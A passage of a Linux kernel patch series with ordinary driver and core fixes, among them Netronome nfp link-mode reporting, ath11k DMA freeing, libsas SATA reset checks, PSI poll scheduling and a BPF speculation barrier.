++				__set_bit(nfp_eth_media_table[i].ethtool_link_mode,
++					  cmd->link_modes.supported);
++				__set_bit(nfp_eth_media_table[i].speed,
++					  port->speed_bitmap);
++			}
++
++			if (advertised_modes[0] & BIT_ULL(i))
++				__set_bit(nfp_eth_media_table[i].ethtool_link_mode,
++					  cmd->link_modes.advertising);
++		} else {
++			if (supported_modes[1] & BIT_ULL(i - 64)) {
++				__set_bit(nfp_eth_media_table[i].ethtool_link_mode,
++					  cmd->link_modes.supported);
++				__set_bit(nfp_eth_media_table[i].speed,
++					  port->speed_bitmap);
++			}
++
++			if (advertised_modes[1] & BIT_ULL(i - 64))
++				__set_bit(nfp_eth_media_table[i].ethtool_link_mode,
++					  cmd->link_modes.advertising);
++		}
++	}
++}
++
+ /**
+  * nfp_net_get_link_ksettings - Get Link Speed settings
+  * @netdev:	network interface device structure
+@@ -311,6 +487,8 @@ nfp_net_get_link_ksettings(struct net_device *netdev,
+ 	u16 sts;
+ 
+ 	/* Init to unknowns */
++	ethtool_link_ksettings_zero_link_mode(cmd, supported);
++	ethtool_link_ksettings_zero_link_mode(cmd, advertising);
+ 	ethtool_link_ksettings_add_link_mode(cmd, supported, FIBRE);
+ 	cmd->base.port = PORT_OTHER;
+ 	cmd->base.speed = SPEED_UNKNOWN;
+@@ -321,6 +499,7 @@ nfp_net_get_link_ksettings(struct net_device *netdev,
+ 	if (eth_port) {
+ 		ethtool_link_ksettings_add_link_mode(cmd, supported, Pause);
+ 		ethtool_link_ksettings_add_link_mode(cmd, advertising, Pause);
++		nfp_add_media_link_mode(port, eth_port, cmd);
+ 		if (eth_port->supp_aneg) {
+ 			ethtool_link_ksettings_add_link_mode(cmd, supported, Autoneg);
+ 			if (eth_port->aneg == NFP_ANEG_AUTO) {
+@@ -395,6 +574,22 @@ nfp_net_set_link_ksettings(struct net_device *netdev,
+ 
+ 	if (cmd->base.speed != SPEED_UNKNOWN) {
+ 		u32 speed = cmd->base.speed / eth_port->lanes;
++		bool is_supported = false;
++
++		for (u32 i = 0; i < NFP_SUP_SPEED_NUMBER; i++) {
++			if (cmd->base.speed == nfp_eth_speed_map[i] &&
++			    test_bit(i, port->speed_bitmap)) {
++				is_supported = true;
++				break;
++			}
++		}
++
++		if (!is_supported) {
++			netdev_err(netdev, "Speed %u is not supported.\n",
++				   cmd->base.speed);
++			err = -EINVAL;
++			goto err_bad_set;
++		}
+ 
+ 		if (req_aneg) {
+ 			netdev_err(netdev, "Speed changing is not allowed when working on autoneg mode.\n");
+diff --git a/drivers/net/ethernet/netronome/nfp/nfp_port.h b/drivers/net/ethernet/netronome/nfp/nfp_port.h
+index 6793cdf9ff115..c31812287ded1 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfp_port.h
++++ b/drivers/net/ethernet/netronome/nfp/nfp_port.h
+@@ -38,6 +38,16 @@ enum nfp_port_flags {
+ 	NFP_PORT_CHANGED = 0,
+ };
+ 
++enum {
++	NFP_SPEED_1G,
++	NFP_SPEED_10G,
++	NFP_SPEED_25G,
++	NFP_SPEED_40G,
++	NFP_SPEED_50G,
++	NFP_SPEED_100G,
++	NFP_SUP_SPEED_NUMBER
++};
++
+ /**
+  * struct nfp_port - structure representing NFP port
+  * @netdev:	backpointer to associated netdev
+@@ -52,6 +62,7 @@ enum nfp_port_flags {
+  * @eth_forced:	for %NFP_PORT_PHYS_PORT port is forced UP or DOWN, don't change
+  * @eth_port:	for %NFP_PORT_PHYS_PORT translated ETH Table port entry
+  * @eth_stats:	for %NFP_PORT_PHYS_PORT MAC stats if available
++ * @speed_bitmap:	for %NFP_PORT_PHYS_PORT supported speed bitmap
+  * @pf_id:	for %NFP_PORT_PF_PORT, %NFP_PORT_VF_PORT ID of the PCI PF (0-3)
+  * @vf_id:	for %NFP_PORT_VF_PORT ID of the PCI VF within @pf_id
+  * @pf_split:	for %NFP_PORT_PF_PORT %true if PCI PF has more than one vNIC
+@@ -78,6 +89,7 @@ struct nfp_port {
+ 			bool eth_forced;
+ 			struct nfp_eth_table_port *eth_port;
+ 			u8 __iomem *eth_stats;
++			DECLARE_BITMAP(speed_bitmap, NFP_SUP_SPEED_NUMBER);
+ 		};
+ 		/* NFP_PORT_PF_PORT, NFP_PORT_VF_PORT */
+ 		struct {
+diff --git a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c
+index 730fea214b8ab..7136bc48530ba 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c
++++ b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c
+@@ -100,6 +100,7 @@ enum nfp_nsp_cmd {
+ 	SPCODE_FW_LOADED	= 19, /* Is application firmware loaded */
+ 	SPCODE_VERSIONS		= 21, /* Report FW versions */
+ 	SPCODE_READ_SFF_EEPROM	= 22, /* Read module EEPROM */
++	SPCODE_READ_MEDIA	= 23, /* Get either the supported or advertised media for a port */
+ };
+ 
+ struct nfp_nsp_dma_buf {
+@@ -1100,4 +1101,20 @@ int nfp_nsp_read_module_eeprom(struct nfp_nsp *state, int eth_index,
+ 	kfree(buf);
+ 
+ 	return ret;
++};
++
++int nfp_nsp_read_media(struct nfp_nsp *state, void *buf, unsigned int size)
++{
++	struct nfp_nsp_command_buf_arg media = {
++		{
++			.code		= SPCODE_READ_MEDIA,
++			.option		= size,
++		},
++		.in_buf		= buf,
++		.in_size	= size,
++		.out_buf	= buf,
++		.out_size	= size,
++	};
++
++	return nfp_nsp_command_buf(state, &media);
+ }
+diff --git a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.h b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.h
+index 992d72ac98d38..8f5cab0032d08 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.h
++++ b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.h
+@@ -65,6 +65,11 @@ static inline bool nfp_nsp_has_read_module_eeprom(struct nfp_nsp *state)
+ 	return nfp_nsp_get_abi_ver_minor(state) > 28;
+ }
+ 
++static inline bool nfp_nsp_has_read_media(struct nfp_nsp *state)
++{
++	return nfp_nsp_get_abi_ver_minor(state) > 33;
++}
++
+ enum nfp_eth_interface {
+ 	NFP_INTERFACE_NONE	= 0,
+ 	NFP_INTERFACE_SFP	= 1,
+@@ -97,6 +102,47 @@ enum nfp_eth_fec {
+ 	NFP_FEC_DISABLED_BIT,
+ };
+ 
++/* link modes about RJ45 haven't been used, so there's no mapping to them */
++enum nfp_ethtool_link_mode_list {
++	NFP_MEDIA_W0_RJ45_10M,
++	NFP_MEDIA_W0_RJ45_10M_HD,
++	NFP_MEDIA_W0_RJ45_100M,
++	NFP_MEDIA_W0_RJ45_100M_HD,
++	NFP_MEDIA_W0_RJ45_1G,
++	NFP_MEDIA_W0_RJ45_2P5G,
++	NFP_MEDIA_W0_RJ45_5G,
++	NFP_MEDIA_W0_RJ45_10G,
++	NFP_MEDIA_1000BASE_CX,
++	NFP_MEDIA_1000BASE_KX,
++	NFP_MEDIA_10GBASE_KX4,
++	NFP_MEDIA_10GBASE_KR,
++	NFP_MEDIA_10GBASE_CX4,
++	NFP_MEDIA_10GBASE_CR,
++	NFP_MEDIA_10GBASE_SR,
++	NFP_MEDIA_10GBASE_ER,
++	NFP_MEDIA_25GBASE_KR,
++	NFP_MEDIA_25GBASE_KR_S,
++	NFP_MEDIA_25GBASE_CR,
++	NFP_MEDIA_25GBASE_CR_S,
++	NFP_MEDIA_25GBASE_SR,
++	NFP_MEDIA_40GBASE_CR4,
++	NFP_MEDIA_40GBASE_KR4,
++	NFP_MEDIA_40GBASE_SR4,
++	NFP_MEDIA_40GBASE_LR4,
++	NFP_MEDIA_50GBASE_KR,
++	NFP_MEDIA_50GBASE_SR,
++	NFP_MEDIA_50GBASE_CR,
++	NFP_MEDIA_50GBASE_LR,
++	NFP_MEDIA_50GBASE_ER,
++	NFP_MEDIA_50GBASE_FR,
++	NFP_MEDIA_100GBASE_KR4,
++	NFP_MEDIA_100GBASE_SR4,
++	NFP_MEDIA_100GBASE_CR4,
++	NFP_MEDIA_100GBASE_KP4,
++	NFP_MEDIA_100GBASE_CR10,
++	NFP_MEDIA_LINK_MODES_NUMBER
++};
++
+ #define NFP_FEC_AUTO		BIT(NFP_FEC_AUTO_BIT)
+ #define NFP_FEC_BASER		BIT(NFP_FEC_BASER_BIT)
+ #define NFP_FEC_REED_SOLOMON	BIT(NFP_FEC_REED_SOLOMON_BIT)
+@@ -256,6 +302,16 @@ enum nfp_nsp_sensor_id {
+ int nfp_hwmon_read_sensor(struct nfp_cpp *cpp, enum nfp_nsp_sensor_id id,
+ 			  long *val);
+ 
++struct nfp_eth_media_buf {
++	u8 eth_index;
++	u8 reserved[7];
++	__le64 supported_modes[2];
++	__le64 advertised_modes[2];
++};
++
++int nfp_nsp_read_media(struct nfp_nsp *state, void *buf, unsigned int size);
++int nfp_eth_read_media(struct nfp_cpp *cpp, struct nfp_eth_media_buf *ethm);
++
+ #define NFP_NSP_VERSION_BUFSZ	1024 /* reasonable size, not in the ABI */
+ 
+ enum nfp_nsp_versions {
+diff --git a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp_eth.c b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp_eth.c
+index bb64efec4c46b..570ac1bb2122f 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp_eth.c
++++ b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp_eth.c
+@@ -647,3 +647,29 @@ int __nfp_eth_set_split(struct nfp_nsp *nsp, unsigned int lanes)
+ 	return NFP_ETH_SET_BIT_CONFIG(nsp, NSP_ETH_RAW_PORT, NSP_ETH_PORT_LANES,
+ 				      lanes, NSP_ETH_CTRL_SET_LANES);
+ }
++
++int nfp_eth_read_media(struct nfp_cpp *cpp, struct nfp_eth_media_buf *ethm)
++{
++	struct nfp_nsp *nsp;
++	int ret;
++
++	nsp = nfp_nsp_open(cpp);
++	if (IS_ERR(nsp)) {
++		nfp_err(cpp, "Failed to access the NSP: %pe\n", nsp);
++		return PTR_ERR(nsp);
++	}
++
++	if (!nfp_nsp_has_read_media(nsp)) {
++		nfp_warn(cpp, "Reading media link modes not supported. Please update flash\n");
++		ret = -EOPNOTSUPP;
++		goto exit_close_nsp;
++	}
++
++	ret = nfp_nsp_read_media(nsp, ethm, sizeof(*ethm));
++	if (ret)
++		nfp_err(cpp, "Reading media link modes failed: %pe\n", ERR_PTR(ret));
++
++exit_close_nsp:
++	nfp_nsp_close(nsp);
++	return ret;
++}
+diff --git a/drivers/net/wireless/ath/ath11k/qmi.c b/drivers/net/wireless/ath/ath11k/qmi.c
+index 7cc5fa3251521..381c6b390dd78 100644
+--- a/drivers/net/wireless/ath/ath11k/qmi.c
++++ b/drivers/net/wireless/ath/ath11k/qmi.c
+@@ -1964,7 +1964,7 @@ static void ath11k_qmi_free_target_mem_chunk(struct ath11k_base *ab)
+ 			continue;
+ 
+ 		dma_free_coherent(ab->dev,
+-				  ab->qmi.target_mem[i].size,
++				  ab->qmi.target_mem[i].prev_size,
+ 				  ab->qmi.target_mem[i].vaddr,
+ 				  ab->qmi.target_mem[i].paddr);
+ 		ab->qmi.target_mem[i].vaddr = NULL;
+@@ -1985,12 +1985,12 @@ static int ath11k_qmi_alloc_target_mem_chunk(struct ath11k_base *ab)
+ 		 * in such case, no need to allocate memory for FW again.
+ 		 */
+ 		if (chunk->vaddr) {
+-			if (chunk->prev_type == chunk->type ||
++			if (chunk->prev_type == chunk->type &&
+ 			    chunk->prev_size == chunk->size)
+ 				continue;
+ 
+ 			/* cannot reuse the existing chunk */
+-			dma_free_coherent(ab->dev, chunk->size,
++			dma_free_coherent(ab->dev, chunk->prev_size,
+ 					  chunk->vaddr, chunk->paddr);
+ 			chunk->vaddr = NULL;
+ 		}
+diff --git a/drivers/net/wireless/marvell/mwifiex/sdio.c b/drivers/net/wireless/marvell/mwifiex/sdio.c
+index b8dc3b5c9ad94..9f506efa53705 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sdio.c
++++ b/drivers/net/wireless/marvell/mwifiex/sdio.c
+@@ -480,6 +480,7 @@ static struct memory_type_mapping mem_type_mapping_tbl[] = {
+ };
+ 
+ static const struct of_device_id mwifiex_sdio_of_match_table[] = {
++	{ .compatible = "marvell,sd8787" },
+ 	{ .compatible = "marvell,sd8897" },
+ 	{ .compatible = "marvell,sd8997" },
+ 	{ }
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index e9c1b62c9c3c2..e445084e358f9 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -4389,12 +4389,9 @@ void rtl8xxxu_gen1_report_connect(struct rtl8xxxu_priv *priv,
+ void rtl8xxxu_gen2_report_connect(struct rtl8xxxu_priv *priv,
+ 				  u8 macid, bool connect)
+ {
+-#ifdef RTL8XXXU_GEN2_REPORT_CONNECT
+ 	/*
+-	 * Barry Day reports this causes issues with 8192eu and 8723bu
+-	 * devices reconnecting. The reason for this is unclear, but
+-	 * until it is better understood, leave the code in place but
+-	 * disabled, so it is not lost.
++	 * The firmware turns on the rate control when it knows it's
++	 * connected to a network.
+ 	 */
+ 	struct h2c_cmd h2c;
+ 
+@@ -4407,7 +4404,6 @@ void rtl8xxxu_gen2_report_connect(struct rtl8xxxu_priv *priv,
+ 		h2c.media_status_rpt.parm &= ~BIT(0);
+ 
+ 	rtl8xxxu_gen2_h2c_cmd(priv, &h2c, sizeof(h2c.media_status_rpt));
+-#endif
+ }
+ 
+ void rtl8xxxu_gen1_init_aggregation(struct rtl8xxxu_priv *priv)
+diff --git a/drivers/platform/x86/amd/pmf/Kconfig b/drivers/platform/x86/amd/pmf/Kconfig
+index c375498c40717..6d89528c31779 100644
+--- a/drivers/platform/x86/amd/pmf/Kconfig
++++ b/drivers/platform/x86/amd/pmf/Kconfig
+@@ -6,6 +6,7 @@
+ config AMD_PMF
+ 	tristate "AMD Platform Management Framework"
+ 	depends on ACPI && PCI
++	depends on POWER_SUPPLY
+ 	select ACPI_PLATFORM_PROFILE
+ 	help
+ 	  This driver provides support for the AMD Platform Management Framework.
+diff --git a/drivers/platform/x86/nvidia-wmi-ec-backlight.c b/drivers/platform/x86/nvidia-wmi-ec-backlight.c
+index baccdf6585382..1b572c90c76ec 100644
+--- a/drivers/platform/x86/nvidia-wmi-ec-backlight.c
++++ b/drivers/platform/x86/nvidia-wmi-ec-backlight.c
+@@ -12,6 +12,10 @@
+ #include <linux/wmi.h>
+ #include <acpi/video.h>
+ 
++static bool force;
++module_param(force, bool, 0444);
++MODULE_PARM_DESC(force, "Force loading (disable acpi_backlight=xxx checks");
++
+ /**
+  * wmi_brightness_notify() - helper function for calling WMI-wrapped ACPI method
+  * @w:    Pointer to the struct wmi_device identified by %WMI_BRIGHTNESS_GUID
+@@ -91,7 +95,7 @@ static int nvidia_wmi_ec_backlight_probe(struct wmi_device *wdev, const void *ct
+ 	int ret;
+ 
+ 	/* drivers/acpi/video_detect.c also checks that SOURCE == EC */
+-	if (acpi_video_get_backlight_type() != acpi_backlight_nvidia_wmi_ec)
++	if (!force && acpi_video_get_backlight_type() != acpi_backlight_nvidia_wmi_ec)
+ 		return -ENODEV;
+ 
+ 	/*
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_main.c b/drivers/scsi/hisi_sas/hisi_sas_main.c
+index 02fa3c00dcccf..a8142e2b96435 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_main.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_main.c
+@@ -1708,13 +1708,15 @@ static int hisi_sas_debug_I_T_nexus_reset(struct domain_device *device)
+ 		return rc;
+ 	}
+ 
++	/* Remote phy */
+ 	if (rc)
+ 		return rc;
+ 
+-	/* Remote phy */
+ 	if (dev_is_sata(device)) {
+-		rc = sas_ata_wait_after_reset(device,
+-					HISI_SAS_WAIT_PHYUP_TIMEOUT);
++		struct ata_link *link = &device->sata_dev.ap->link;
++
++		rc = ata_wait_after_reset(link, HISI_SAS_WAIT_PHYUP_TIMEOUT,
++					  smp_ata_check_ready_type);
+ 	} else {
+ 		msleep(2000);
+ 	}
+diff --git a/drivers/scsi/libsas/sas_ata.c b/drivers/scsi/libsas/sas_ata.c
+index d35c9296f7388..2fd55ef9ffca5 100644
+--- a/drivers/scsi/libsas/sas_ata.c
++++ b/drivers/scsi/libsas/sas_ata.c
+@@ -287,6 +287,31 @@ static int sas_ata_clear_pending(struct domain_device *dev, struct ex_phy *phy)
+ 		return 1;
+ }
+ 
++int smp_ata_check_ready_type(struct ata_link *link)
++{
++	struct domain_device *dev = link->ap->private_data;
++	struct sas_phy *phy = sas_get_local_phy(dev);
++	struct domain_device *ex_dev = dev->parent;
++	enum sas_device_type type = SAS_PHY_UNUSED;
++	u8 sas_addr[SAS_ADDR_SIZE];
++	int res;
++
++	res = sas_get_phy_attached_dev(ex_dev, phy->number, sas_addr, &type);
++	sas_put_local_phy(phy);
++	if (res)
++		return res;
++
++	switch (type) {
++	case SAS_SATA_PENDING:
++		return 0;
++	case SAS_END_DEVICE:
++		return 1;
++	default:
++		return -ENODEV;
++	}
++}
++EXPORT_SYMBOL_GPL(smp_ata_check_ready_type);
++
+ static int smp_ata_check_ready(struct ata_link *link)
+ {
+ 	int res;
+diff --git a/drivers/scsi/libsas/sas_expander.c b/drivers/scsi/libsas/sas_expander.c
+index 5ce2518301040..63a23251fb1d8 100644
+--- a/drivers/scsi/libsas/sas_expander.c
++++ b/drivers/scsi/libsas/sas_expander.c
+@@ -1693,8 +1693,8 @@ static int sas_get_phy_change_count(struct domain_device *dev,
+ 	return res;
+ }
+ 
+-static int sas_get_phy_attached_dev(struct domain_device *dev, int phy_id,
+-				    u8 *sas_addr, enum sas_device_type *type)
++int sas_get_phy_attached_dev(struct domain_device *dev, int phy_id,
++			     u8 *sas_addr, enum sas_device_type *type)
+ {
+ 	int res;
+ 	struct smp_disc_resp *disc_resp;
+diff --git a/drivers/scsi/libsas/sas_internal.h b/drivers/scsi/libsas/sas_internal.h
+index 8d0ad3abc7b5c..a94bd0790b055 100644
+--- a/drivers/scsi/libsas/sas_internal.h
++++ b/drivers/scsi/libsas/sas_internal.h
+@@ -84,6 +84,8 @@ struct domain_device *sas_ex_to_ata(struct domain_device *ex_dev, int phy_id);
+ int sas_ex_phy_discover(struct domain_device *dev, int single);
+ int sas_get_report_phy_sata(struct domain_device *dev, int phy_id,
+ 			    struct smp_rps_resp *rps_resp);
++int sas_get_phy_attached_dev(struct domain_device *dev, int phy_id,
++			     u8 *sas_addr, enum sas_device_type *type);
+ int sas_try_ata_reset(struct asd_sas_phy *phy);
+ void sas_hae_reset(struct work_struct *work);
+ 
+diff --git a/drivers/spi/spi-mt65xx.c b/drivers/spi/spi-mt65xx.c
+index d6aff909fc365..9eab6c20dbc56 100644
+--- a/drivers/spi/spi-mt65xx.c
++++ b/drivers/spi/spi-mt65xx.c
+@@ -1192,11 +1192,6 @@ static int mtk_spi_probe(struct platform_device *pdev)
+ 	else
+ 		dma_set_max_seg_size(dev, SZ_256K);
+ 
+-	ret = devm_request_irq(dev, irq, mtk_spi_interrupt,
+-			       IRQF_TRIGGER_NONE, dev_name(dev), master);
+-	if (ret)
+-		return dev_err_probe(dev, ret, "failed to register irq\n");
+-
+ 	mdata->parent_clk = devm_clk_get(dev, "parent-clk");
+ 	if (IS_ERR(mdata->parent_clk))
+ 		return dev_err_probe(dev, PTR_ERR(mdata->parent_clk),
+@@ -1258,6 +1253,11 @@ static int mtk_spi_probe(struct platform_device *pdev)
+ 		dev_notice(dev, "SPI dma_set_mask(%d) failed, ret:%d\n",
+ 			   addr_bits, ret);
+ 
++	ret = devm_request_irq(dev, irq, mtk_spi_interrupt,
++			       IRQF_TRIGGER_NONE, dev_name(dev), master);
++	if (ret)
++		return dev_err_probe(dev, ret, "failed to register irq\n");
++
+ 	pm_runtime_enable(dev);
+ 
+ 	ret = devm_spi_register_master(dev, master);
+diff --git a/fs/ext4/sysfs.c b/fs/ext4/sysfs.c
+index d233c24ea3425..e2b8b3437c589 100644
+--- a/fs/ext4/sysfs.c
++++ b/fs/ext4/sysfs.c
+@@ -491,6 +491,11 @@ static void ext4_sb_release(struct kobject *kobj)
+ 	complete(&sbi->s_kobj_unregister);
+ }
+ 
++static void ext4_feat_release(struct kobject *kobj)
++{
++	kfree(kobj);
++}
++
+ static const struct sysfs_ops ext4_attr_ops = {
+ 	.show	= ext4_attr_show,
+ 	.store	= ext4_attr_store,
+@@ -505,7 +510,7 @@ static struct kobj_type ext4_sb_ktype = {
+ static struct kobj_type ext4_feat_ktype = {
+ 	.default_groups = ext4_feat_groups,
+ 	.sysfs_ops	= &ext4_attr_ops,
+-	.release	= (void (*)(struct kobject *))kfree,
++	.release	= ext4_feat_release,
+ };
+ 
+ void ext4_notify_error_sysfs(struct ext4_sb_info *sbi)
+diff --git a/include/asm-generic/vmlinux.lds.h b/include/asm-generic/vmlinux.lds.h
+index 3dc5824141cd2..7ad6f51b3d914 100644
+--- a/include/asm-generic/vmlinux.lds.h
++++ b/include/asm-generic/vmlinux.lds.h
+@@ -929,7 +929,12 @@
+ #define PRINTK_INDEX
+ #endif
+ 
++/*
++ * Discard .note.GNU-stack, which is emitted as PROGBITS by the compiler.
++ * Otherwise, the type of .notes section would become PROGBITS instead of NOTES.
++ */
+ #define NOTES								\
++	/DISCARD/ : { *(.note.GNU-stack) }				\
+ 	.notes : AT(ADDR(.notes) - LOAD_OFFSET) {			\
+ 		__start_notes = .;					\
+ 		KEEP(*(.note.*))					\
+diff --git a/include/linux/nospec.h b/include/linux/nospec.h
+index c1e79f72cd892..9f0af4f116d98 100644
+--- a/include/linux/nospec.h
++++ b/include/linux/nospec.h
+@@ -11,6 +11,10 @@
+ 
+ struct task_struct;
+ 
++#ifndef barrier_nospec
++# define barrier_nospec() do { } while (0)
++#endif
++
+ /**
+  * array_index_mask_nospec() - generate a ~0 mask when index < size, 0 otherwise
+  * @index: array element index
+diff --git a/include/linux/psi_types.h b/include/linux/psi_types.h
+index 6e43727350689..14a1ebb74e11f 100644
+--- a/include/linux/psi_types.h
++++ b/include/linux/psi_types.h
+@@ -177,6 +177,7 @@ struct psi_group {
+ 	struct timer_list poll_timer;
+ 	wait_queue_head_t poll_wait;
+ 	atomic_t poll_wakeup;
++	atomic_t poll_scheduled;
+ 
+ 	/* Protects data used by the monitor */
+ 	struct mutex trigger_lock;
+diff --git a/include/linux/random.h b/include/linux/random.h
+index bd954ecbef901..51133627ba73a 100644
+--- a/include/linux/random.h
++++ b/include/linux/random.h
+@@ -19,14 +19,14 @@ void add_input_randomness(unsigned int type, unsigned int code,
+ void add_interrupt_randomness(int irq) __latent_entropy;
+ void add_hwgenerator_randomness(const void *buf, size_t len, size_t entropy);
+ 
+-#if defined(LATENT_ENTROPY_PLUGIN) && !defined(__CHECKER__)
+ static inline void add_latent_entropy(void)
+ {
++#if defined(LATENT_ENTROPY_PLUGIN) && !defined(__CHECKER__)
+ 	add_device_randomness((const void *)&latent_entropy, sizeof(latent_entropy));
+-}
+ #else
+-static inline void add_latent_entropy(void) { }
++	add_device_randomness(NULL, 0);
+ #endif
++}
+ 
+ #if IS_ENABLED(CONFIG_VMGENID)
+ void add_vmfork_randomness(const void *unique_vm_id, size_t len);
+diff --git a/include/scsi/sas_ata.h b/include/scsi/sas_ata.h
+index a1df4f9d57a31..ec646217e7f6e 100644
+--- a/include/scsi/sas_ata.h
++++ b/include/scsi/sas_ata.h
+@@ -35,6 +35,7 @@ void sas_ata_end_eh(struct ata_port *ap);
+ int sas_execute_ata_cmd(struct domain_device *device, u8 *fis,
+ 			int force_phy_id);
+ int sas_ata_wait_after_reset(struct domain_device *dev, unsigned long deadline);
++int smp_ata_check_ready_type(struct ata_link *link);
+ #else
+ 
+ 
+@@ -98,6 +99,11 @@ static inline int sas_ata_wait_after_reset(struct domain_device *dev,
+ {
+ 	return -ETIMEDOUT;
+ }
++
++static inline int smp_ata_check_ready_type(struct ata_link *link)
++{
++	return 0;
++}
+ #endif
+ 
+ #endif /* _SAS_ATA_H_ */
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index 17ab3e15ac25f..211f63e87c637 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -34,6 +34,7 @@
+ #include <linux/log2.h>
+ #include <linux/bpf_verifier.h>
+ #include <linux/nodemask.h>
++#include <linux/nospec.h>
+ 
+ #include <asm/barrier.h>
+ #include <asm/unaligned.h>
+@@ -1908,9 +1909,7 @@ out:
+ 		 * reuse preexisting logic from Spectre v1 mitigation that
+ 		 * happens to produce the required code on x86 for v4 as well.
+ 		 */
+-#ifdef CONFIG_X86
+ 		barrier_nospec();
+-#endif
+ 		CONT;
+ #define LDST(SIZEOP, SIZE)						\
+ 	STX_MEM_##SIZEOP:						\
+diff --git a/kernel/sched/psi.c b/kernel/sched/psi.c
+index 48fedeee15c5b..e83c321461cf4 100644
+--- a/kernel/sched/psi.c
++++ b/kernel/sched/psi.c
+@@ -189,6 +189,7 @@ static void group_init(struct psi_group *group)
+ 	INIT_DELAYED_WORK(&group->avgs_work, psi_avgs_work);
+ 	mutex_init(&group->avgs_lock);
+ 	/* Init trigger-related members */
++	atomic_set(&group->poll_scheduled, 0);
+ 	mutex_init(&group->trigger_lock);
+ 	INIT_LIST_HEAD(&group->triggers);
+ 	group->poll_min_period = U32_MAX;
+@@ -565,18 +566,17 @@ static u64 update_triggers(struct psi_group *group, u64 now)
+ 	return now + group->poll_min_period;
+ }
+ 
+-/* Schedule polling if it's not already scheduled. */
+-static void psi_schedule_poll_work(struct psi_group *group, unsigned long delay)
++/* Schedule polling if it's not already scheduled or forced. */
++static void psi_schedule_poll_work(struct psi_group *group, unsigned long delay,
++				   bool force)
+ {
+ 	struct task_struct *task;
+ 
+ 	/*
+-	 * Do not reschedule if already scheduled.
+-	 * Possible race with a timer scheduled after this check but before
+-	 * mod_timer below can be tolerated because group->polling_next_update
+-	 * will keep updates on schedule.
++	 * atomic_xchg should be called even when !force to provide a
++	 * full memory barrier (see the comment inside psi_poll_work).
+ 	 */
+-	if (timer_pending(&group->poll_timer))
++	if (atomic_xchg(&group->poll_scheduled, 1) && !force)
+ 		return;
+ 
+ 	rcu_read_lock();
+@@ -588,12 +588,15 @@ static void psi_schedule_poll_work(struct psi_group *group, unsigned long delay)
+ 	 */
+ 	if (likely(task))
+ 		mod_timer(&group->poll_timer, jiffies + delay);
++	else
++		atomic_set(&group->poll_scheduled, 0);
+ 
+ 	rcu_read_unlock();
+ }
+ 
+ static void psi_poll_work(struct psi_group *group)
+ {
++	bool force_reschedule = false;
+ 	u32 changed_states;
+ 	u64 now;
+ 
+@@ -601,6 +604,43 @@ static void psi_poll_work(struct psi_group *group)
+ 
+ 	now = sched_clock();
+ 
++	if (now > group->polling_until) {
++		/*
++		 * We are either about to start or might stop polling if no
++		 * state change was recorded. Resetting poll_scheduled leaves
++		 * a small window for psi_group_change to sneak in and schedule
++		 * an immediate poll_work before we get to rescheduling. One
++		 * potential extra wakeup at the end of the polling window
++		 * should be negligible and polling_next_update still keeps
++		 * updates correctly on schedule.
++		 */
++		atomic_set(&group->poll_scheduled, 0);
++		/*
++		 * A task change can race with the poll worker that is supposed to
++		 * report on it. To avoid missing events, ensure ordering between
++		 * poll_scheduled and the task state accesses, such that if the poll
++		 * worker misses the state update, the task change is guaranteed to
++		 * reschedule the poll worker:
++		 *
++		 * poll worker:
++		 *   atomic_set(poll_scheduled, 0)
++		 *   smp_mb()
++		 *   LOAD states
++		 *
++		 * task change:
++		 *   STORE states
++		 *   if atomic_xchg(poll_scheduled, 1) == 0:
++		 *     schedule poll worker
++		 *
++		 * The atomic_xchg() implies a full barrier.
++		 */
++		smp_mb();
++	} else {
++		/* Polling window is not over, keep rescheduling */
++		force_reschedule = true;
++	}
++
++
+ 	collect_percpu_times(group, PSI_POLL, &changed_states);
+ 
+ 	if (changed_states & group->poll_states) {
+@@ -626,7 +666,8 @@ static void psi_poll_work(struct psi_group *group)
+ 		group->polling_next_update = update_triggers(group, now);
+ 
+ 	psi_schedule_poll_work(group,
+-		nsecs_to_jiffies(group->polling_next_update - now) + 1);
++		nsecs_to_jiffies(group->polling_next_update - now) + 1,
++		force_reschedule);
+ 
+ out:
+ 	mutex_unlock(&group->trigger_lock);
+@@ -787,7 +828,7 @@ static void psi_group_change(struct psi_group *group, int cpu,
+ 	write_seqcount_end(&groupc->seq);
+ 
+ 	if (state_mask & group->poll_states)
+-		psi_schedule_poll_work(group, 1);
++		psi_schedule_poll_work(group, 1, false);
+ 
+ 	if (wake_clock && !delayed_work_pending(&group->avgs_work))
+ 		schedule_delayed_work(&group->avgs_work, PSI_FREQ);
+@@ -941,7 +982,7 @@ void psi_account_irqtime(struct task_struct *task, u32 delta)
+ 		write_seqcount_end(&groupc->seq);
+ 
+ 		if (group->poll_states & (1 << PSI_IRQ_FULL))
+-			psi_schedule_poll_work(group, 1);
++			psi_schedule_poll_work(group, 1, false);
+ 	} while ((group = group->parent));
+ }
+ #endif
+@@ -1328,6 +1369,7 @@ void psi_trigger_destroy(struct psi_trigger *t)
+ 		 * can no longer be found through group->poll_task.
+ 		 */
+ 		kthread_stop(task_to_destroy);
++		atomic_set(&group->poll_scheduled, 0);
+ 	}
+ 	kfree(t);
+ }
+diff --git a/lib/usercopy.c b/lib/usercopy.c
